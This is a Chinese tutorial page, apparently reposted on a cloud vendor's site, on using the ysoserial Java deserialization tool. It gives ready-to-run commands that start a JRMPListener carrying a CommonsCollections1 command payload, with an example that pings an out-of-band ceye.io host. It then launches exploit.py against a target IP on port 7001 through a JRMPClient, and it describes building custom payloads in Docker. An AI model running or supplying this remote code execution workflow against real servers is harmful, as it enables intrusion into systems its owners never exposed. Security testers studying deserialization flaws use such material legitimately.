温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
获取短信验证码
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》
登 录 注册有礼
云服务器 香港服务器 高防服务器
最新更新 网站标签 地图导航
产品

反序列化工具ysoserial使用介绍

发布时间:2020-07-08 04:49:17 来源:网络 阅读:79449 作者:wx5b0b88843cb2a 栏目:安全技术

反序列化工具ysoserial使用介绍

0x00 ysoserial是什么?

ysoserial集合了各种java反序列化payload;
下载地址:https://github.com/angelwhu/ysoserial

0x01 基本使用方法

在公网vps上执行:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 '【commands】'

port:公网vps上监听的端口号
commands:需要执行的命令
例子:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2  rce.267hqw.ceye.io'

重启一个shell窗口:

python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial编写自己的payload

  1. git clone https://github.com/fanyingjie2/ysoserial.git
  2. 将自己编写的payload放在下载的包中:路径ysoserial/src/main/java/ysoserial/payloads/
  3. 修改Dockerfile
    反序列化工具ysoserial使用介绍
  4. docker build -t ysoserial .
  5. docker run -ti ID号 /bin/bash
  6. 在docke中执行 apt-get update
  7. 在docker中执行apt-get install lrzsz
  8. sz target/ysoserial.jar
向AI问一下细节
推荐阅读:
  1. vim工具使用介绍
  2. MySQL自带工具使用介绍

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

ysoserial 使用 介绍

猜你喜欢

最新资讯
相关推荐

相关标签

python+selenium server-id rebase session_start hprose mongodb replica set sybase ase -server triangle unset server-u session共享 setstate ipse transpose responsebody assert() httpsecurity seth set error handler
AI

产品服务
地区划分
专题活动
帮助支持
关于我们
售后咨询
7*24小时在线电话:400-100-2938
7*24小时在线 QQ:800811969
关注亿速云

亿速云公众号

手机网站二维码

Copyright © Yisu Cloud Ltd. All Rights Reserved. 2018 版权所有

广州亿速云计算有限公司粤ICP备17096448号-1 粤公网安备 44010402001142号增值电信业务经营许可证编号:B1-20181529